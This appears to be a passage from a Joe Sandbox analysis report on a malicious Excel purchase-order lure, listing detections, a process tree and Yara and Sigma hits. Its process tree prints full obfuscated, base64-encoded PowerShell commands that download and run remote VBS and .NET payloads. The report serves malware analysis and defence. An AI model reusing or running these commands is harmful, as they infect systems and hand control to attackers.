Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Orden_de_Compra_Nmero_6782929219.xls

Overview

General Information

Sample name:Orden_de_Compra_Nmero_6782929219.xls
Analysis ID:1572123
MD5:02312414e969b79f88ffde0b68090227
SHA1:aab17d76b523a0a1c79391468885ab855a6f2196
SHA256:8ca816015c1a43fa8cfe732759ba029e176f94e372176ccb8940d91cfc6a7984
Tags:xlsuser-abuse_ch
Infos:

Detection

HTMLPhisher
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected HtmlPhish44
Yara detected Powershell download and execute
Connects to a pastebin service (likely for C&C)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3312 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3592 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3692 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3716 cmdline: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3920 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4044 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 4092 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals MD5: A575A7610E5F003CC36DF39E07C4BA7D)
    • AcroRd32.exe (PID: 3764 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding MD5: 2F8D93826B8CBF9290BC57535C7A6817)
      • RdrCEF.exe (PID: 1404 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043 MD5: 326A645391A97C760B60C558A35BB068)
    • mshta.exe (PID: 1972 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 3684 cmdline: "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 3932 cmdline: poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 1844 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 2064 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 4068 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3832 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCcxJywnJGZvcmViZWFyJykpOw==';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals MD5: A575A7610E5F003CC36DF39E07C4BA7D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive[1].htaJoeSecurity_HtmlPhish_44Yara detected HtmlPhish_44Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: powershell.exe PID: 4092JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 4092INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x4aa7f:$b2: ::FromBase64String(
      • 0x55e1c:$b2: ::FromBase64String(
      • 0x728d2:$b2: ::FromBase64String(
      • 0x72f2c:$b2: ::FromBase64String(
      • 0x7485c:$b2: ::FromBase64String(
      • 0x75014:$b2: ::FromBase64String(
      • 0x75d01:$b2: ::FromBase64String(
      • 0x7e6f9:$b2: ::FromBase64String(
      • 0x8f7aa:$b2: ::FromBase64String(
      • 0x8f813:$b2: ::FromBase64String(
      • 0x91274:$b2: ::FromBase64String(
      • 0x4aa5e:$b3: ::UTF8.GetString(
      • 0x55c3c:$b3: ::UTF8.GetString(
      • 0x728b1:$b3: ::UTF8.GetString(
      • 0x72f0b:$b3: ::UTF8.GetString(
      • 0x7483b:$b3: ::UTF8.GetString(
      • 0x74ff3:$b3: ::UTF8.GetString(
      • 0x75ce0:$b3: ::UTF8.GetString(
      • 0x7e6d8:$b3: ::UTF8.GetString(
      • 0x8f7f2:$b3: ::UTF8.GetString(
      • 0x91253:$b3: ::UTF8.GetString(
      Process Memory Space: powershell.exe PID: 3832JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 3832INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xf5a3:$b2: ::FromBase64String(
        • 0xfd5e:$b2: ::FromBase64String(
        • 0x2ca53:$b2: ::FromBase64String(
        • 0x34585:$b2: ::FromBase64String(
        • 0x460f6:$b2: ::FromBase64String(
        • 0x4615f:$b2: ::FromBase64String(
        • 0x47c42:$b2: ::FromBase64String(
        • 0x568ca:$b2: ::FromBase64String(
        • 0x6fa8c:$b2: ::FromBase64String(
        • 0x700e6:$b2: ::FromBase64String(
        • 0xf582:$b3: ::UTF8.GetString(
        • 0xfd3d:$b3: ::UTF8.GetString(
        • 0x2ca32:$b3: ::UTF8.GetString(
        • 0x34564:$b3: ::UTF8.GetString(
        • 0x4613e:$b3: ::UTF8.GetString(
        • 0x47c21:$b3: ::UTF8.GetString(
        • 0x566ea:$b3: ::UTF8.GetString(
        • 0x6fa6b:$b3: ::UTF8.GetString(
        • 0x700c5:$b3: ::UTF8.GetString(
        • 0x14460:$s1: -join
        • 0x2446e:$s1: -join

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: Base64 Encoded PowerShell Command Detected
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = 'JHByZW9idGFpbnMgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHl0Zmx0NjFuL2ltYWdlL3VwbG9hZC92MTczMzEzNDk0Ny9ia2xweXNleWV1dDRpbXB3NTBuMS5qcGcgJzskbGFsbHlnYWdnaW5nID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDskdGF1bnRpbmdseSA9ICRsYWxseWdhZ2dpbmcuRG93bmxvYWREYXRhKCRwcmVvYnRhaW5zKTskbm9udmlyZ2lucyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCR0YXVudGluZ2x5KTskbmV3c21lbiA9ICc8PEJBU0U2NF9TVEFSVD4+Jzskc3Bpcml0dWFsaXN0aWMgPSAnPDxCQVNFNjRfRU5EPj4nOyRhc2Fmb2V0aWRhcyA9ICRub252aXJnaW5zLkluZGV4T2YoJG5ld3NtZW4pOyRzbm9vemUgPSAkbm9udmlyZ2lucy5JbmRleE9mKCRzcGlyaXR1YWxpc3RpYyk7JGFzYWZvZXRpZGFzIC1nZSAwIC1hbmQgJHNub296ZSAtZ3QgJGFzYWZvZXRpZGFzOyRhc2Fmb2V0aWRhcyArPSAkbmV3c21lbi5MZW5ndGg7JG95ZXMgPSAkc25vb3plIC0gJGFzYWZvZXRpZGFzOyRzdGlsbGluZyA9ICRub252aXJnaW5zLlN1YnN0cmluZygkYXNhZm9ldGlkYXMsICRveWVzKTskaG9sbG93bmVzc2VzID0gLWpvaW4gKCRzdGlsbGluZy5Ub0NoYXJBcnJheSgpIHwgRm9yRWFjaC1PYmplY3QgeyAkXyB9KVstMS4uLSgkc3RpbGxpbmcuTGVuZ3RoKV07JGNvbGVzbGF3cyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGhvbGxvd25lc3Nlcyk7JG1hbmFnZW1lbnRzID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkY29sZXNsYXdzKTskamV3ZmlzaCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRqZXdmaXNoLkludm9rZSgkbnVsbCwgQCgnMC9uQ3gzMC9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGZvcmViZWFyJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCAnQ2FzUG9sJywgJyRmb3JlYmVhcicsICckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLCckZm9yZWJlYXInLC